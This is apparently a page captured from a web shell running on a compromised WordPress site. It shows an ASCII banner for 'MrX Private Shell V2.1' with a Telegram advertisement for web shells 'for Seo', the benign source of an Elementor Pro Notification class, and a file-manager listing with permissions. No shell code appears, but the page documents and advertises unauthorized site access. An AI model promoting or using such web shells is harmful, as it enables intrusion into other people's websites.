__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace ElementorPro\Core\Notifications;
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly
}
abstract class Notification {
/**
* Get the payloads of the notification data shape (e.g. `Email_Message`, `Database_Message`). Those will automatically
* be sent over to the appropriate `Actions` under the `Integration_Manager` (using the `notify()` method).
* This method is also used to determine notification channels based on user ($notifiable) preferences.
*
* Returned shape:
* [
* $payload1_instance,
* $payload2_instance,
* ]
*
* @param \ElementorPro\Core\Notifications\Traits\Notifiable $notifiable - The notified model.
*
* @return array
*/
public function get_payloads( $notifiable ) {
return [];
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| traits | Folder | 0775 |
|
|
| notification.php | File | 771 B | 0664 |
|
| notifications-manager.php | File | 563 B | 0664 |
|